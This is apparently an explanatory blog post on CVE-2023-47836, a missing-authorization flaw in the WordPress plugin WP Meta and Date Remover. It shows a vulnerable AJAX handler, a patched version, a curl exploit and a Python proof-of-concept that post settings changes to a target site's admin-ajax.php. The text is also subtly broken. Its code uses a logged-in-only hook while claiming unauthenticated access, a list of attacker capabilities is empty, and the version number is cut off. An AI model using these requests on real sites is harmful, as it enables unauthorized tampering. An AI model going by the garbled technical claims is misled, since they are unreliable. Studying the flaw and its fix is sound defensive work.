CVE-2023-47836 is a security vulnerability in the popular WordPress plugin, _WP Meta and Date Remover_, developed by Prasad Kirpekar. This vulnerability affects all plugin versions up to and including 2.3.. It's a Missing Authorization flaw, which means attackers can exploit weak or incomplete access control to perform actions they shouldn't be allowed to.
In this post, we’ll break down what’s behind CVE-2023-47836, demonstrate exploit details with code snippets, share why it matters, and list all the important references to help you stay secure.
What is WP Meta and Date Remover?
WP Meta and Date Remover is a WordPress plugin designed to clean up blog posts by removing metadata and publication dates from the frontend. The plugin is widely used by bloggers and WordPress site owners to give content a fresh look, regardless of publishing date or author details.
Exploit Impact: Allows attackers to access or change settings that should require admin access.
- Discovered by: Prasad Kirpekar (Original plugin developer)
How Does the Vulnerability Work?
Missing Authorization means that the backend code does not properly check whether a user (for example, a site visitor) is authorized to make certain changes or view sensitive information.
For WP Meta and Date Remover, the vulnerable code is found in the plugin’s admin AJAX handlers, which fail to check if the request is coming from a logged-in administrator. This means a normal website visitor (even without logging in) can trigger these admin actions!
Vulnerable Code Snippet
Here’s a simplified example of what the vulnerable code looks like in wp-meta-and-date-remover.php:
// Vulnerable: No check for user capability!
add_action('wp_ajax_save_settings', 'wpmdr_save_settings');
function wpmdr_save_settings() {
// Directly get and set options without checking privilege
update_option('wpmdr_settings', $_POST['settings']);
echo 'Settings saved!';
wp_die();
}
What’s Missing?
No function like current_user_can('manage_options') is verifying if the request comes from an administrator!
Correct Approach (Safe Code)
// Secure: Verify user privilege!
add_action('wp_ajax_save_settings', 'wpmdr_save_settings');
function wpmdr_save_settings() {
if (!current_user_can('manage_options')) {
wp_die('Unauthorized');
}
update_option('wpmdr_settings', $_POST['settings']);
echo 'Settings saved!';
wp_die();
}
How Could Attackers Abuse This?
By submitting specially crafted AJAX requests, an attacker does not need to be logged in to change plugin settings. This could let them:
Example Exploit (cURL Command)
curl -X POST \
-d "action=save_settings&settings=bad_settings_here" \
https://victimsite.com/wp-admin/admin-ajax.php
Replace bad_settings_here with any malicious payload the attacker wishes to inject.
Result: The attacker updates the plugin’s settings without any authorization!
Proof-of-Concept (PoC)
import requests
url = 'https://victimsite.com/wp-admin/admin-ajax.php'
data = {
'action': 'save_settings',
'settings': 'dangerous_value'
}
r = requests.post(url, data=data)
print('Response:', r.text)
This Python code sends an unauthorized request to the target WordPress site, modifying the plugin’s settings!
Timeline & Affected Versions
| Version | Status |
|-------------------|-------------|
| ≤ 2.3. | Vulnerable |
| > 2.3. | (Check for patched versions) |
Update the Plugin:
Always use the latest version from WordPress.org.
2. Check for active users or suspicious changes in your WordPress back‑end if your site ran vulnerable code.
References & Further Reading
- WPScan Entry for CVE-2023-47836
- NVD Listing
- WP Meta and Date Remover on WordPress.org
- Secure WordPress Coding
Conclusion
CVE-2023-47836 is a classic case of a missing authorization check in a popular WordPress plugin. This type of vulnerability is easy to exploit, easy to prevent, and extremely dangerous if left unpatched. If you’re running WP Meta and Date Remover, update immediately and review your access control on all plugins.
Stay safe, keep your site updated, and always check your plugins’ code for missing privilege checks!
> *This post is for responsible disclosure and educational purposes. Do not exploit websites without permission.*
Timeline
Published on: 12/09/2024 13:15:31 UTC